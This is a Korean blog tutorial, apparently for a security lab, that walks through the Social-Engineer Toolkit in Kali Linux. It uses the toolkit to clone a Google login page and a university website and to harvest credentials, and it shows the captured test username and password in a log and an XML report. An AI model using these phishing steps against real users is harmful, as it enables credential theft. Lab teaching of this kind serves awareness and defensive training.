- 패스트 트랙(Fasttrack): 자동 공격 도구
메타스포로잇 모듈을 사용한다.
이 도구는 메타스포로잇에 기반을 두고 있고 공격 기법 중 하나인 Autopwn 공격은 내장되어 있는 기능 중 엔맵(nmap)을 통해 네트워크 스캐닝 작업을 하여 대상 시스템을 검색하고, 그에 대한 운영체제, 포트, IP 주소를 분석하며 그에 해당하는 모든 취약점을 자동화 스크립트로 공격한다.
칼리리눅스에서는 SET(사회 공학 기법)에 통합되었다.
- SET(Social Engineering Tech., 사회 공학적 공격 기법)
사회공학이란 컴퓨터 보안에서 인간 상호작용의 깊은 신뢰를 바탕으로 사람들을 속여 정상 보안 절차를 깨트리기 위한 비기술적 침입 수단이다.
APT(Advanced Persistent Threat) 공격이 이제 공공기관과 특정 사용자를 타겟 대상으로 접근하다 보니 더욱더 내부적인 보안에 신경을 쓰게 되었다.
- 사회공학적 기법을 사용한 공격에 대한 분류
인간기반
- 공격의 대상이 이간이고, 직접적인 접근( 훔쳐보기, 물어보기 )이나
전화( 보이스 피싱 )등을 사용하는 방법
컴퓨터기반
- 악성코드(애드웨어, 스파이웨어등), 컴퓨터 프로그램,
가짜 웹 사이트를 이용한 공격( 파밍 )
악성코드 기반
- DDoS 공격을 위한 봇넷, 대규모 스팸 메일에 첨부된 악성코드
- 피싱의 종류
피싱(phishing) - 많은 사람들이 타겟 ( email )
스피어 피싱(spear phishing) - 특정 사용자 타겟 ( email )
보이스 피싱(voice phishing) - ( 전화 )
스미싱 (smishing)
티비싱(tivishing)
파밍(pharming) - 은행과 같이 개인정보를 입력해야하는 사이트를 페이크 사이트로 만들어 사용자 정보 획득
- 사용 시스템
KaliLinux
Windows 7
|
ii set 7.6.1-0kali1 all Social-Engineer Toolkit |
|
- 설정
[참고]
KaliLinux 1.X ) /usr/share/set/config/set_config
KaliLinux 2.X ) /usr/share/set/config 디렉토리가 존재하지 않는다. -> 설정 안해도 됨
[ KaliLinux 1.X ]
# vi /sur/share/set/config/set_config
|
### Path to the pem file to utilize certificates with the web attack vector (required) ### You can create your own utilizing set, just turn on self_signed_cert ### If your using this flag, ensure openssl is installed! To turn this on turn SELF_SIGNED_CERT ### to the on position. [수정전]
[수정후] SELF_SIGNED_CERT=ON |
|
- 실습
setoolkit 을 이용하여 Fack site를 만들어 ID/PASS 를 확인해보자. ( 교육과 실습용으로만 사용 )
(kali)
# setoolkit
-> Do you agree to the terms of service [y/n]: y
|
[-] New set.config.py file generated on: 2017-11-12 14:29:50.189741 [-] Verifying configuration update... [*] Update verified, config timestamp is: 2017-11-12 14:29:50.189741 [*] SET is using the new config, no need to restart XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XX XX XX MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM XX XX MMMMMMMMMMMMMMMMMMMMMssssssssssssssssssssssssssMMMMMMMMMMMMMMMMMMMMM XX XX MMMMMMMMMMMMMMMMss''' '''ssMMMMMMMMMMMMMMMM XX XX MMMMMMMMMMMMyy'' ''yyMMMMMMMMMMMM XX XX MMMMMMMMyy'' ''yyMMMMMMMM XX XX MMMMMy'' ''yMMMMM XX XX MMMy' 'yMMM XX XX Mh' 'hM XX XX - - XX XX XX XX :: :: XX XX MMhh. ..hhhhhh.. ..hhhhhh.. .hhMM XX XX MMMMMh ..hhMMMMMMMMMMhh. .hhMMMMMMMMMMhh.. hMMMMM XX XX ---MMM .hMMMMdd:::dMMMMMMMhh.. ..hhMMMMMMMd:::ddMMMMh. MMM--- XX XX MMMMMM MMmm'' 'mmMMMMMMMMyy. .yyMMMMMMMMmm' ''mmMM MMMMMM XX XX ---mMM '' 'mmMMMMMMMM MMMMMMMMmm' '' MMm--- XX XX yyyym' . 'mMMMMm' 'mMMMMm' . 'myyyy XX XX mm'' .y' ..yyyyy.. '''' '''' ..yyyyy.. 'y. ''mm XX XX MN .sMMMMMMMMMss. . . .ssMMMMMMMMMs. NM XX XX N` MMMMMMMMMMMMMN M M NMMMMMMMMMMMMM `N XX XX + .sMNNNNNMMMMMN+ `N N` +NMMMMMNNNNNMs. + XX XX o+++ ++++Mo M M oM++++ +++o XX XX oo oo XX XX oM oo oo Mo XX XX oMMo M M oMMo XX XX +MMMM s s MMMM+ XX XX +MMMMM+ +++NNNN+ +NNNN+++ +MMMMM+ XX XX +MMMMMMM+ ++NNMMMMMMMMN+ +NMMMMMMMMNN++ +MMMMMMM+ XX XX MMMMMMMMMNN+++NNMMMMMMMMMMMMMMNNNNMMMMMMMMMMMMMMNN+++NNMMMMMMMMM XX XX yMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMy XX XX m yMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMy m XX XX MMm yMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMy mMM XX XX MMMm .yyMMMMMMMMMMMMMMMM MMMMMMMMMM MMMMMMMMMMMMMMMMyy. mMMM XX XX MMMMd ''''hhhhh odddo obbbo hhhh'''' dMMMM XX XX MMMMMd 'hMMMMMMMMMMddddddMMMMMMMMMMh' dMMMMM XX XX MMMMMMd 'hMMMMMMMMMMMMMMMMMMMMMMh' dMMMMMM XX XX MMMMMMM- ''ddMMMMMMMMMMMMMMdd'' -MMMMMMM XX XX MMMMMMMM '::dddddddd::' MMMMMMMM XX XX MMMMMMMM- -MMMMMMMM XX XX MMMMMMMMM MMMMMMMMM XX XX MMMMMMMMMy yMMMMMMMMM XX XX MMMMMMMMMMy. .yMMMMMMMMMM XX XX MMMMMMMMMMMMy. .yMMMMMMMMMMMM XX XX MMMMMMMMMMMMMMy. .yMMMMMMMMMMMMMM XX XX MMMMMMMMMMMMMMMMs. .sMMMMMMMMMMMMMMMM XX XX MMMMMMMMMMMMMMMMMMss. .... .ssMMMMMMMMMMMMMMMMMM XX XX MMMMMMMMMMMMMMMMMMMMNo oNNNNo oNMMMMMMMMMMMMMMMMMMMM XX XX XX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX .o88o. o8o . 888 `" `"' .o8 o888oo .oooo.o .ooooo. .ooooo. oooo .ooooo. .o888oo oooo ooo 888 d88( "8 d88' `88b d88' `"Y8 `888 d88' `88b 888 `88. .8' 888 `"Y88b. 888 888 888 888 888ooo888 888 `88..8' 888 o. )88b 888 888 888 .o8 888 888 .o 888 . `888' o888o 8""888P' `Y8bod8P' `Y8bod8P' o888o `Y8bod8P' "888" d8' .o...P' `XER0' [---] The Social-Engineer Toolkit (SET) [---] [---] Created by: David Kennedy (ReL1K) [---] Version: 7.7.4 Codename: 'Blackout' [---] Follow us on Twitter: @TrustedSec [---] [---] Follow me on Twitter: @HackingDave [---] [---] Homepage: https://www.trustedsec.com [---] Welcome to the Social-Engineer Toolkit (SET). The one stop shop for all of your SE needs. Join us on irc.freenode.net in channel #setoolkit The Social-Engineer Toolkit is a product of TrustedSec. Visit: https://www.trustedsec.com It's easy to update using the PenTesters Framework! (PTF) Visit https://github.com/trustedsec/ptf to update all your tools! Select from the menu: 1) Social-Engineering Attacks 2) Penetration Testing (Fast-Track) 3) Third Party Modules 4) Update the Social-Engineer Toolkit 5) Update SET configuration 6) Help, Credits, and About 99) Exit the Social-Engineer Toolkit /* 먼저 4, 5 Update를 해줍니다 */ set> 4 ....... set> 5 /* 사회 공학적 공격 선택 */ set> 1 Select from the menu: 1) Spear-Phishing Attack Vectors 2) Website Attack Vectors 3) Infectious Media Generator 4) Create a Payload and Listener 5) Mass Mailer Attack 6) Arduino-Based Attack Vector 7) Wireless Access Point Attack Vector 8) QRCode Generator Attack Vector 9) Powershell Attack Vectors 10) SMS Spoofing Attack Vector 11) Third Party Modules 99) Return back to the main menu. /* 본 실습은 웹사이트를 이용한 공격이므로 2번 */ set> 2 The Web Attack module is a unique way of utilizing multiple web-based attacks in order to compromise the intended victim. The Java Applet Attack method will spoof a Java Certificate and deliver a metasploit based payload. Uses a customized java applet created by Thomas Werth to deliver the payload. The Metasploit Browser Exploit method will utilize select Metasploit browser exploits through an iframe and deliver a Metasploit payload. The Credential Harvester method will utilize web cloning of a web- site that has a username and password field and harvest all the information posted to the website. The TabNabbing method will wait for a user to move to a different tab, then refresh the page to something different. The Web-Jacking Attack method was introduced by white_sheep, emgent. This method utilizes iframe replacements to make the highlighted URL link to appear legitimate however when clicked a window pops up then is replaced with the malicious link. You can edit the link replacement settings in the set_config if its too slow/fast. The Multi-Attack method will add a combination of attacks through the web attack menu. For example you can utilize the Java Applet, Metasploit Browser, Credential Harvester/Tabnabbing all at once to see which is successful. The HTA Attack method will allow you to clone a site and perform powershell injection through HTA files which can be used for Windows-based powershell exploitation through the browser. 1) Java Applet Attack Method 2) Metasploit Browser Exploit Method 3) Credential Harvester Attack Method 4) Tabnabbing Attack Method 5) Web Jacking Attack Method 6) Multi-Attack Web Method 7) Full Screen Attack Method 8) HTA Attack Method 99) Return to Main Menu /* 위에 Java Applet Attack, Metasploit Browser Exploit,... 보기에 관련된 설명들을 확인 할 수 있습니다. */ /* 본 실습은 3번 */ set:webattack>3 The first method will allow SET to import a list of pre-defined web applications that it can utilize within the attack. The second method will completely clone a website of your choosing and allow you to utilize the attack vectors within the completely same web application you were attempting to clone. The third method allows you to import your own website, note that you should only have an index.html when using the import website functionality. 1) Web Templates 2) Site Cloner 3) Custom Import 99) Return to Webattack Menu set:webattack>1 [-] Credential harvester will allow you to utilize the clone capabilities within SET [-] to harvest credentials or parameters from a website as well as place them into a report [-] This option is used for what IP the server will POST to. [-] If you're using an external IP, use your external IP for this set:webattack> IP address for the POST back in Harvester/Tabnabbing [192.168.17.50]:192.168.27.50 /* win7 에서 접속할 IP대역인 192.168.27.50 을 설정합니다. */ /* 실습 환경이 Kali가 두개의 IP를 가지고 있기때문에 설정이 다를뿐 다른 환경이라면 Kali의 IP를 적으시면 됩니다. */ 1. Java Required 2. Google 3. Facebook 4. Twitter 5. Yahoo set:webattack> Select a template:2 [*] Cloning the website: http://www.google.com [*] This could take a little bit... The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a website. [*] The Social-Engineer Toolkit Credential Harvester Attack [*] Credential Harvester is running on port 80 [*] Information will be displayed to you as it arrives below: |
|
(win7)
http://192.168.27.50 으로 접속해봅니다.
간단히 ID/PASS test@test.com/test123 을 입력합니다.
> 아이디와 패스워드를 입력하니 바로 google.com 원래 사이트로 돌아옵니다.
(kali )
|
192.168.27.202 - - [12/Nov/2017 14:00:27] "GET / HTTP/1.1" 200 - directory traversal attempt detected from: 192.168.27.202 192.168.27.202 - - [12/Nov/2017 14:00:30] "GET /favicon.ico HTTP/1.1" 404 - [*] WE GOT A HIT! Printing the output: PARAM: GALX=SJLCkfgaqoM PARAM: continue=https://accounts.google.com/o/oauth2/auth?zt=ChRsWFBwd2JmV1hIcDhtUFdldzBENhIfVWsxSTdNLW9MdThibW1TMFQzVUZFc1BBaURuWml RSQ%E2%88%99APsBz4gAAAAAUy4_qD7Hbfz38w8kxnaNouLcRiD3YTjX PARAM: service=lso PARAM: dsh=-7381887106725792428 PARAM: _utf8=☃ PARAM: bgresponse=js_disabled PARAM: pstMsg=1 PARAM: dnConn= PARAM: checkConnection= PARAM: checkedDomains=youtube POSSIBLE USERNAME FIELD FOUND: Email=test@test.com POSSIBLE PASSWORD FIELD FOUND: Passwd=test123 PARAM: signIn=Sign+in PARAM: PersistentCookie=yes [*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT. |
|
>Email 과 Passwd 가 다 전송된것을 확인 할 수 있습니다.
# cd /root/.set/reports
# ls
|
2017-11-12 14:39:45.877026.html 2017-11-12 14:39:45.877026.xml files |
|
# vi 2017-11-12\ 14\:39\:45.877026.xml
|
<?xml version="1.0" encoding='UTF-8'?> <harvester> URL=http://www.google.com <url> <param>GALX=SJLCkfgaqoM</param> <param>continue=https://accounts.google.com/o/oauth2/auth?zt=ChRsWFBwd2JmV1hIcDhtUFdldzBENhIfVWsxSTdNLW9MdThibW1TMFQzVUZFc1BBaURuWmlRS Q%E2%88%99APsBz4gAAAAAUy4_qD7Hbfz38w8kxnaNouLcRiD3YTjX</param> <param>service=lso</param> <param>dsh=-7381887106725792428</param> <param>_utf8=☃</param> <param>bgresponse=js_disabled</param> <param>pstMsg=1</param> <param>dnConn=</param> <param>checkConnection=</param> <param>checkedDomains=youtube</param> <param>Email=test@test.com</param> <param>Passwd=test123</param> <param>signIn=Sign+in</param> <param>PersistentCookie=yes</param> </url> </harvester> |
|
|
1) Web Templates 2) Site Cloner 3) Custom Import 99) Return to Webattack Menu set:webattack>2 [-] Credential harvester will allow you to utilize the clone capabilities within SET [-] to harvest credentials or parameters from a website as well as place them into a report [-] This option is used for what IP the server will POST to. [-] If you're using an external IP, use your external IP for this set:webattack> IP address for the POST back in Harvester/Tabnabbing [192.168.17.50]:192.168.27.50 [-] SET supports both HTTP and HTTPS [-] Example: http://www.thisisafakesite.com set:webattack> Enter the url to clone:http://www.seoul.ac.kr [*] Cloning the website: http://www.seoul.ac.kr [*] This could take a little bit... The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a website. [*] The Social-Engineer Toolkit Credential Harvester Attack [*] Credential Harvester is running on port 80 [*] Information will be displayed to you as it arrives below: |
|
(win7)
'Security > 정보 수집' 카테고리의 다른 글
| Armitage 사용하기 (0) | 2017.11.12 |
|---|---|
| setoolkit을 이용한 Java Applet Attack (0) | 2017.11.12 |
| 웹캠 제어하기 (1) | 2017.11.11 |
| 패스워드 해시 덤프 ( password the hash dump ) (0) | 2017.11.11 |
| 키보드 스니핑과 스크린샷 (0) | 2017.11.11 |
